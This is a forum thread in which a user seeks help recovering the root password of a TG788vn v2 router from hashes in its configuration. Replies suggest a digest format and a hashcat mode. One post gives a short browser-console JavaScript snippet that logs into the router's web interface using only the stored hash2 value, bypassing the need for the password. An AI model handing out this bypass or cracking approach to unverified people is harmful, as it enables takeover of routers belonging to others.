Recover xDsl Router TG788vn v2 Password
#1
Hi all,
i hope that someone more skilled than me in cracking password could help me.

I have a TG788vn v2 xDsl Router,
this router store the password in this way:

add name=user password=_CYP2_0f08c71d768ab52da7d549b63ce5921d13e2e6a4e7a2b82b role=User hash2=86XXXXXXXXe3b204a22a1ff11ed32cc8 crypt=6hE5DKnJKEmeA

(masked hash2 but is the same user and password for all routers)

Now i know that the password for user: "user" is "user", yeah user: user password: user.

I have found this info for another router of the same manifacturer for the model TG784n v3:  md5("$user:Thomson Gateway:$password"), that, like i saw, store the password in the same way.

Now i don't need the password for the user: "user" (that i already know is user like i said), that is a low level user, but the one for the root access, stored in the same way.

I'm really a noob, i have tried to read some post here, and copied and tested some command line, without success, probably cause i'm doing something wrong.

As example i have tested "cudaHashcat64.exe -a 3 -m 0 --force -1 ?u?l?d "86d646fb27e3b204a22a1ff11ed32cc8" ?1?1?1?1 -o found.txt" to see if i found the password "user" of the user "user". Without success, so if the command don't work to check the password that i know, is useless to test with the other one, sob.
#2
Funny how you masked the first hash but not the one in the command line, side note (as it is warned) don't report issues when using --force.

Then you're not providing enough details, tried a few combinations with md5("$user:Thomson Gateway:$password"), but didn't get any match, try with the shortest username/password to identify what the algo exactly is.

You should be able to figure out what that "crypt" thing is pretty easily.

Finally your usage of hashcat, as seen by your command line doesn't match what you are assuming to be the algorithm (not taking into account the salt/username)

You should do some more research I guess.
#3
(01-08-2016, 11:44 PM)Xanadrel Wrote: Then you're not providing enough details, tried a few combinations with md5("$user:Thomson Gateway:$password"), but didn't get any match, try with the shortest username/password to identify what the algo exactly is.

You should be able to figure out what that "crypt" thing is pretty easily.


Do you think that's salt?

(01-08-2016, 11:44 PM)Xanadrel Wrote: Finally your usage of hashcat, as seen by your command line doesn't match what you are assuming to be the algorithm (not taking into account the salt/username)

You should do some more research I guess.

I'll try, but my knowledge of cryptography / programming is very poor...
#4
I have found aroud the net, that with this comand on Chorme console i can enter with user XXXXXX knowing only the hash2.

Reading this there is a way to understand the correct way to decrypt the hash?

Code:
var user = "XXXXXX"; 
var hash2 = "YYYYYY";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();
#5
this hashing algorithm looks very similar to -m 11400 = SIP digest authentication (MD5)